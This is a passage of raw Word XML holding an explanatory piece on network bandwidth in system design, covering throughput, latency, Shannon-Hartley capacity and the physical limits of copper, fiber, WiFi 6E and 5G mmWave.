              <w:t>Protocols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45088A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>HTTP/2, gRPC+Protobuf, compression, batching reduce overhead.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="22B6D3C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1BC7F4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Caching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D2BD5A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Every cache hit = bandwidth saved. Maximize hit ratio.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="7F374AD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E747F7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>CDN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C0C44A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Mandatory for bandwidth-heavy content (media, static assets).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="662AD24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3FBD0E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Cost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44818D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Egress is expensive in cloud. Architecture should minimize it.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="250BD44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D25972" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Scalability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BE27DC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Scale horizontally (more links, more servers). Upgrade links vertically.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="70A155E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DC5C59" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Monitoring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CF9C06" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Track utilization, drops, retransmissions. Non-linear latency growth near capacity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7869D3A3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The fundamental bandwidth principle for system design:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE90822" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bandwidth is a finite, shared, and often expensive resource. Every architectural decision should minimize unnecessary data movement — through caching (avoid re-fetching), compression (reduce size), batching (reduce overhead), locality (keep data close to compute), and efficient protocols (minimize per-message cost).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE9B3D4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>The systems that scale best are those that treat bandwidth as a first-class constraint — not something that "will probably be fine" — and design data flow patterns that minimize cross-boundary transfers while maximizing the utility of each byte sent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE12E6B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00AD5AD3"/>
    <w:p w14:paraId="5FE952F0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bandwidth — Deep Technical Breakdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151FAE10" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:pict w14:anchorId="50752EFF">
          <v:rect id="_x0000_i4467" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B654C5D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What Bandwidth Actually Is (The Real Engineering Problem)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782F8098" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Bandwidth is one of the most </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>misused and misunderstood terms</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> in systems engineering. It is routinely conflated with throughput, confused with latency, and treated as a simple number when it is actually a </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>multi-dimensional constraint</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> that manifests differently at every layer of the network stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51654E50" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>The precise definition: </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bandwidth is the maximum rate at which data can be transferred over a network path, measured in bits per second.</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> It is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> measurement — the theoretical ceiling of how much data can flow, not how much actually does flow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367A4016" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>But this definition immediately requires decomposition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF94A7C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bandwidth ≠ Throughput.</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Bandwidth is the capacity of the pipe. Throughput is how much data actually flows through it. A 1Gbps link can have 100Mbps throughput if TCP's congestion control has limited the window, if the CPU is the bottleneck, or if protocol overhead consumes 90% of capacity. Throughput is always ≤ bandwidth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AB3D42" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bandwidth ≠ Latency.</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> A satellite link can have high bandwidth (500Mbps) and high latency (600ms RTT). A dialup modem has low bandwidth (56Kbps) and low latency (50ms RTT). They are independent physical properties. But they interact — and understanding that interaction is where real systems engineering depth lies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C59C804" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bandwidth is not a single number.</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Every link in the path between two communicating systems has its own bandwidth. The effective bandwidth is determined by the </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bottleneck link</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve"> — the link with the smallest capacity in the path. But even this is insufficient — the </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>bottleneck can shift over time as traffic patterns change, as other flows compete for the same links, and as congestion control algorithms adapt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5B46C1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>The engineering problem bandwidth creates is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bandwidth-latency product</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> — the relationship between bandwidth, latency, and the amount of data in flight. Understanding this product is the key to understanding why high-bandwidth networks behave counterintuitively, why TCP performs poorly on certain paths, and why systems that work fine in one network environment fail catastrophically in another.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B612FD" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:pict w14:anchorId="3A98C9EC">
          <v:rect id="_x0000_i4468" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F032237" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. The Physics of Bandwidth — What Limits It at the Hardware Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76447B8F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Electromagnetic Constraints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C450626" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Copper wire (Ethernet, DSL, coaxial cable):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F09BA8B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>The bandwidth of a copper wire is fundamentally limited by its </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>frequency response</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> — how faithfully it can transmit electrical signals at high frequencies. Signal attenuation increases with frequency — high-frequency components of a signal are lost over distance more than low-frequency components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73463F0F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Shannon-Hartley theorem</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> establishes the absolute theoretical maximum channel capacity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EE171C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F98656" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>C = B × log₂(1 + S/N)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA339B4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="43E98B87" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>C = channel capacity (bits per second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719A8B6A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>B = bandwidth of the channel (Hz) — the range of frequencies the medium can carry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E34563" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>S/N = signal-to-noise ratio (linear, not dB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E9C5C0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>For a copper Ethernet cable (Cat6):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585427F9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1177"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Bandwidth: 250 MHz (Cat6) — the range of frequencies the cable can carry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8E5167" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1177"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>SNR: ~30 dB = 1000 linear.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D59D03" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1177"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Theoretical capacity: 250MHz × log₂(1001) ≈ 250MHz × 9.97 ≈ </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.5 Gbps</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF51F3A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Cat6a extends to 500MHz → ~5 Gbps theoretical. Cat8 extends to 2000MHz → ~20 Gbps. The physical medium's frequency response is the fundamental limit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BBFB8B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The frequency vs distance trade-off:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Copper's attenuation at high frequencies increases with cable length. A Cat6 cable at 100m can carry 1Gbps signals. The same cable at 50m can carry 10Gbps. At 1m, 40Gbps is achievable. </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bandwidth and distance are inversely related in copper</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> — this is why data center cabling uses very short copper runs for high-speed links (25Gbps, 100Gbps) while longer distances use fiber.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EADDDA2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fiber optic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1C7D65" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Optical fiber carries light pulses rather than electrical signals. Light propagates through the fiber via </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>total internal reflection</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> — light hits the glass-air interface at a shallow angle and is completely reflected, staying within the fiber.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03037AF7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>The bandwidth of fiber is almost incomprehensibly large — a single fiber strand has a theoretical capacity of ~100 Tbps (terabits per second) using </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wavelength division multiplexing (WDM)</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t>, where multiple wavelengths (colors) of light carry independent data streams simultaneously on the same physical fiber.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3790FF2B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The actual limiting factor in fiber:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Not the fiber itself but the </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>optical-to-electrical conversion</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> at each end. Photodetectors and laser modulators have finite bandwidth. State-of-the-art coherent optical transceivers operate at 400Gbps per wavelength with 80+ wavelengths per fiber = 32Tbps per fiber pair in commercial deployments. The fiber medium is not the bottleneck — the equipment is.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5099D942" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wireless (WiFi, cellular):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39309224" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Wireless bandwidth is governed by the </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>radio frequency spectrum</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> — a finite, regulated resource. The Shannon-Hartley theorem applies here too, but S/N varies dramatically with distance, interference, and physical obstacles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17634EC4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WiFi 6E (802.11ax):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D166F4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1178"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>6GHz band: 1200MHz of available spectrum (much more than 2.4GHz's 100MHz or 5GHz's 500MHz).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17678FDC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1178"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>160MHz channel width: each WiFi channel occupies 160MHz of spectrum.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B06B001" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1178"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>1200/160 = 7.5 non-overlapping channels in 6GHz.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9B0256" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1178"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>With 1024-QAM modulation and 8×8 MIMO: </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.6 Gbps theoretical maximum</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> per access point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B56D57" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>In practice, WiFi achieves 20–40% of theoretical maximum due to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4630831D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1179"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Half-duplex radio:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> WiFi can't transmit and receive simultaneously on the same channel. Every byte sent consumes time that could be receiving.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E22C793" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1179"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CSMA/CA (Carrier Sense Multiple Access with Collision Avoidance):</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Before transmitting, each device listens to ensure the channel is idle. This coordination overhead reduces effective throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274F3CA7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1179"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Interference:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Multiple access points, microwave ovens, Bluetooth, neighboring networks all compete for the same spectrum.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D69BE0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1179"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Distance-based signal degradation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> SNR drops with distance → lower modulation order → lower bits/symbol → lower throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3526A59C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5G NR (New Radio):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AC2538" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>5G achieves high bandwidth via </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>millimeter wave (mmWave)</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> bands (24–100GHz). The enormous available spectrum (several GHz per carrier) enables peak throughputs of 20Gbps. The fundamental physical limitation of mmWave: </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>extremely poor propagation</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t>. mmWave signals are blocked by walls, absorbed by rain, and attenuate dramatically within 100 meters. 5G mmWave works only with dense small cell deployments and line-of-sight or near-line-of-sight paths.</w:t>
      </w:r>
    </w:p>
